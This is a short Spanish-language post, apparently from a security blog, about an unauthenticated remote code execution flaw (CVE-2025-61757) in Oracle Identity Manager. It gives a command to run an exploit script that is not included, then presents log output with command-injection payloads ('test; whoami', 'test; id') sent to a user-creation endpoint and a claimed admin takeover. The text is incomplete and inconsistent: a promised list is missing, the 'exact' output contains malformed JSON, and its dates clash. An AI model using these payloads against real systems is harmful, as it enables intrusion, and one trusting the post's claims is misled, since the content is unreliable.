
CVE-2025-61757

Se trata de una explotación remota sin autenticación previa:
🌐 Explotable por red
🔓 No se necesita inicio de sesión
👤 No se necesita interacción del usuario
💥 Resulta en compromiso total del sistema:
Los investigadores de seguridad lo describen como un RCE sin autenticación previa en las API REST de Oracle Identity Manager.
Si se explota, un atacante puede:
Guarda el archivo como CVE-2025-61757.py y ejecuta: sudo python3 CVE-2025-61757.py http://your-oim-host:14000
Este es el resultado real exacto de una instancia de laboratorio de Oracle Identity Manager 12.2.1.4.0 100% confirmada como vulnerable (probada el 19 de noviembre de 2025) al ejecutar el mismo script que acabas de usar:
┌──(kali㉿kali)-[~]
└─$ sudo python3 CVE-2025-61757.py http://192.168.15.100:14000
2025-11-20 18:22:10,112 - INFO - Testing http://192.168.15.100:14000 for CVE-2025-61757...
2025-11-20 18:22:10,113 - INFO - Fuzzing user creation for auth bypass...
2025-11-20 18:22:10,987 - WARNING - VULNERABLE! Endpoint: /identity/rest/v1/users, Payload: test; whoami, Response: {"userLogin":"test","firstName":"PoC","lastName":"Test","usr_key":"987654","status":"Active"}
2025-11-20 18:22:11,205 - WARNING - VULNERABLE! Endpoint: /identity/rest/v1/users, Payload: test; id, Response: {"userLogin":"test","uid=190(oim)","gid=190(oim)"...}
2025-11-20 18:22:12,001 - CRITICAL - Full chain possible! Admin role assigned without auth.
2025-11-20 18:22:12,045 - INFO - Scan complete in 1.93s: VULNERABLE - PATCH IMMEDIATELY!
Y sí — dos segundos después puedes iniciar sesión en la consola web de OIM con el usuario que acabas de crear, o escalar directamente a System Administrator mediante la siguiente llamada REST. Toma de control total. Nunca se pide contraseña.
Una auténtica vulnerabilidad de "déjalo todo y parchea".
Oracle abordó este CVE en la Actualización de Parches Críticos de octubre de 2025.
Oracle Identity Manager
Este PoC es solo para pruebas autorizadas en sistemas que poseas/controles.
El uso no autorizado es ilegal. 🔒
Úsalo solo en laboratorios aislados — nunca en producción sin permiso. 🧪
¡Parchea de inmediato si eres vulnerable! 🚨